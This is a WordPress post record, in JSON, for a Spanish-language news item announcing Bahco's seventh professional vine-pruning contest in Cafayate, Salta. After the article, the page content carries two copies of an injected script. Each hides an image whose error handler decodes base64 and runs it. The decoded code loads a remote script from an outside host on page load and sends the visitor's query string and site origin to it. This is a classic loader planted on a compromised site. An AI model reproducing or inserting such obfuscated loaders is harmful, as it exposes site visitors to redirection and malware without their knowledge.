{"id":4093,"date":"2024-06-10T12:06:36","date_gmt":"2024-06-10T15:06:36","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4093"},"modified":"2025-08-13T23:54:41","modified_gmt":"2025-08-14T02:54:41","slug":"una-marca-internacional-realizara-un-sudamericano-de-poda-profesional-de-la-vid-en-cafayate","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4093","title":{"rendered":"Una marca internacional realizar\u00e1 un sudamericano de poda profesional de la vid en Cafayate"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-0db67e71457bca7a192ed6f594b554f9\" style=\"background-color:#8a0460\"><em>El fabricante europeo Bahco realizar\u00e1 la s\u00e9ptima edici\u00f3n del evento el 29 de junio.<\/em><\/h3>\n\n\n\n<p>Bahco primer fabricante europeo de tijeras de poda, serruchos, y dem\u00e1s herramientas de mano, llevar\u00e1 a cabo la s\u00e9ptima edici\u00f3n del Concurso de Poda Profesional de Vid en la provincia de Salta. El evento se realizar\u00e1 el 29 de junio en Finca Las Nubes, Cafayate.<\/p>\n\n\n\n<p>Esta competencia anual de poda, re\u00fane a los mejores podadores de Argentina, por lo que a la provincia llegar\u00e1n competidores de todo el pa\u00eds que participar\u00e1n en el evento en la Ruta del Vino de Altura.<\/p>\n\n\n\n<p>Esta s\u00e9ptima edici\u00f3n del concurso en Salta genera grandes expectativas y entusiasmo; se extiende la invitaci\u00f3n a todos los podadores profesionales que representen una bodega o finca. Las inscripciones se podr\u00e1n realizar a trav\u00e9s de este enlace o escribiendo un correo a:&nbsp;<a href=\"https:\/\/www.salta.gob.ar\/eventos@bahco.com.ar\">eventos@bahco.com.ar<\/a><br>&nbsp;<br>Los participantes dispondr\u00e1n de 30 minutos para demostrar sus habilidades ante un jurado compuesto por expertos, quienes los evaluar\u00e1n en base a criterios de precisi\u00f3n, destreza, t\u00e9cnica y velocidad al realizar los cortes.<br>&nbsp;<br>El concurso es abierto al p\u00fablico en general, especialmente a turistas que deseen conocer y vivir la experiencia de una de las pr\u00e1cticas claves en la planificaci\u00f3n de la vitivinicultura. El proceso que finaliza con la vendimia, inicia a\u00f1o a a\u00f1o con la poda que se realiza en los vi\u00f1edos.<br>&nbsp;<br>La poda es un trabajo milenario y fundamental en el cultivo, el cual se lleva a cabo antes de que la vid despierte de su invierno, y que consiste en cortar las ramas o ramificaciones para darle forma, vigor e incrementar la producci\u00f3n. La importancia de la poda radica en que de ella depende la pr\u00f3xima y subsiguientes vendimias, as\u00ed como la evoluci\u00f3n de la cepa a largo plazo. Es una pr\u00e1ctica compleja y delicada en la que se deben considerar diversos factores.<br>&nbsp;<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/una-marca-internacional-realizara-un-sudamericano-de-poda-profesional-de-la-vid-en-cafayate-96091\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El fabricante europeo Bahco realizar\u00e1 la s\u00e9ptima edici\u00f3n del evento el 29 de junio. Bahco primer fabricante europeo de tijeras de poda, serruchos, y dem\u00e1s herramientas de mano, llevar\u00e1 a cabo la s\u00e9ptima edici\u00f3n del Concurso de Poda Profesional de Vid en la provincia de Salta. El evento se realizar\u00e1 el 29 de junio en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4094,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,24],"tags":[],"class_list":{"0":"post-4093","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-bodegas"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4093"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4093"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4093\/revisions"}],"predecessor-version":[{"id":6768,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4093\/revisions\/6768"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4094"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4093"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4093"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4093"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}